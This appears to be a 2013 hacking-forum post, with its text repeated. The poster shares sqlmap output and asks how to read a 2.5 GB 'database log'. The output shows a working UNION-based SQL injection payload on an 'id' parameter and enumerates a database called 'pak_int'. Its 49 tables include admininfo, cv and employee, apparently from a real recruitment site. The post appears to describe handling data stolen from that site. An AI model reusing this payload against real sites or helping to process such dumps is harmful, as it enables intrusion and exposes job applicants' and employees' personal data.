1
Hacking and Security / Better way to read ?
« on: December 26, 2013, 08:56:12 am »
Morning guys
i've found some database log , beginning od the log are look like this
any idea how to read in a better way , because it was 2.5 gb size
thanks in advance
Staff note: lrn2codetag
i've found some database log , beginning od the log are look like this
Code: [Select]
sqlmap identified the following injection points with a total of 2122 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: UNION query
Title: MySQL UNION query (random number) - 8 columns
Payload: id=-2478 UNION ALL SELECT 1003, CONCAT(0x3a6661733a,0x79527352695a42655172,0x3a7a73753a), 1003, 1003, 1003, 1003, 1003, 1003#
---
available databases [2]:
[*] information_schema
[*] pak_int
Code: [Select]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: UNION query
Title: MySQL UNION query (random number) - 8 columns
Payload: id=-2478 UNION ALL SELECT 1003, CONCAT(0x3a6661733a,0x79527352695a42655172,0x3a7a73753a), 1003, 1003, 1003, 1003, 1003, 1003#
---
Database: pak_int
[49 tables]
+---------------------------+
| admininfo |
| articles |
| banner |
| category |
| city |
| cms |
| company |
| country |
| cover_letters |
| currency |
| cv |
| cvachievements |
| cveduhistory |
| cvlanguages |
| cvprojects |
| cvrefrences |
| cvs |
| cvskills |
| degrees |
| department |
| employee |
| employee_network_employee
any idea how to read in a better way , because it was 2.5 gb size
thanks in advance
Staff note: lrn2codetag